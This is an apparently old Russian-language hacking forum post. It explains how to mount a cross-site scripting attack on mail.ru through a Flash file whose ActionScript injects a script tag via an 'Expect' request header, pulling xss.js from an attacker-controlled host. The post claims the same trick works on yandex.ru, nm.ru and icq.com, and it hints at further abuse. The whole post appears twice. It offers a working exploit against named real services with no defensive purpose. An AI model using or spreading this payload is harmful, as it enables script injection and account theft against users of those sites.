Go0o$E
16.10.2006, 19:56
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:
http://f.foto.radikal.ru/0610/329d56f4fb55t.jpg (http://foto.radikal.ru/f.aspx?f0610329d56f4fb55jpg)
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>");
req.decode("XSS");
req.send("http://www.mail.ru","POST");
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.
Уменьшаем размер и экспортируем Flash: File->Export->Export Image.
http://c.foto.radikal.ru/0610/e9816fa10677t.jpg (http://foto.radikal.ru/f.aspx?c0610e9816fa10677jpg)
Вот в принципе и все. Думаю вы знаете что дальше делать.
P.S. Еще работает на yandex.ru, nm.ru и icq.com.
Создание Flash:
http://f.foto.radikal.ru/0610/329d56f4fb55t.jpg (http://foto.radikal.ru/f.aspx?f0610329d56f4fb55jpg)
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>");
req.decode("XSS");
req.send("http://www.mail.ru","POST");
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.
Уменьшаем размер и экспортируем Flash: File->Export->Export Image.
http://c.foto.radikal.ru/0610/e9816fa10677t.jpg (http://foto.radikal.ru/f.aspx?c0610e9816fa10677jpg)
Вот в принципе и все. Думаю вы знаете что дальше делать.
P.S. Еще работает на yandex.ru, nm.ru и icq.com.